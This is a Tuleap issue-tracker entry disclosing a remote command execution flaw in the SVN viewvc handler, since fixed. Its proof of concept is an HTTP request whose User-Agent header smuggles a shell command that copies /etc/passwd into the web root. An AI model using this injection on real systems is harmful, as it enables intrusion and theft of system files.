•  
      request #7457 Remote Command Execution Vulnerability
    Infos
    #7457
    Nicolas Terray (nterray)
    2014-10-28 18:18
    2014-09-18 14:59
    7455
    Details
    Remote Command Execution Vulnerability

    Tuleap does not validate the syntax of the request sent to SVN handler pages to validate request passed to passthru() is introducing any extra parameters that would be executed in the content of the application.

    This vulnerability can be exploited by external attackers to introduce external commands into its workflow that would execute them as shown on the attached Proof Of Concept code below.

     

    Impact

    Complete loss of confidentiality and integrity of the affected system.

    Exploit

    After registering with the application and sending a request similar to the one below the vulnerability can be triggered:

    GET /svn/viewvc.php/?roottype=svn&root=t11 HTTP/1.1
    Host: [IP]
    User-Agent: M" && cat /etc/passwd >
    /usr/share/codendi/src/www/passwd.txt && "ozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: https://[IP]/svn/?group_id=102
    Cookie: PHPSESSID=2uqjkd0iupn84gigi4e1tekg95;
    TULEAP_session_hash=362a9e41d1a93c8f195db4ccc6698ef5
    Connection: keep-alive
    Cache-Control: max-age=0

     

    Note: Any user with privilege to view svn directories will be in position to exploit this issue. This usually implies that any user (even lowest level) on the system can get access to the svn repository to browse it and since users can register themselves this issue allows for direct exploitation.

    SCM/Subversion
    7.5
    Empty
    • [ ] enhancement
    • [ ] internal improvement
    Empty
    Stage
    Empty
    Closed
    2014-09-26
    Attachments
    Empty
    References

    Follow-ups

    User avatar
    Integrated in Tuleap 7.5.99.6

    • Status changed from New to Closed
    • Close date set to 2014-09-22